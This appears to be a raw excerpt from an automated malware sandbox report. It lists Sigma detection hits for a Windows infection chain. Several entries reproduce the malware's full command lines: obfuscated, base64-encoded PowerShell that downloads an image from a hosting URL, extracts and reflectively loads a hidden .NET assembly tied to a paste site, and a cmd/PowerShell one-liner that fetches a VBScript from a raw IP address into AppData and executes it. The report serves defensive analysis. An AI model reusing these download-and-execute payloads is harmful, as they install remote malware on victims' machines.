'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRhcnMnLCAnJGNlZGFycycsICckY2VkYXJzJywgJ0Nhc1BvbCcsICckY2VkYXJzJywgJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJzEnLCckY2VkYXJzJywnJykpOw==';$periblem = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($antimagistrical));Invoke-Expression $periblem, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRh
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2916, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS" , ProcessId: 792, ProcessName: wscript.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2916, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.cmdline", ProcessId: 1772, ProcessName: csc.exe
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2916, TargetFilename: C:\Users\user\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2916, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS" , ProcessId: 792, ProcessName: wscript.exe
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2916, TargetFilename: C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.cmdline
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))", CommandLine: pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA

                        Data Obfuscation

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQ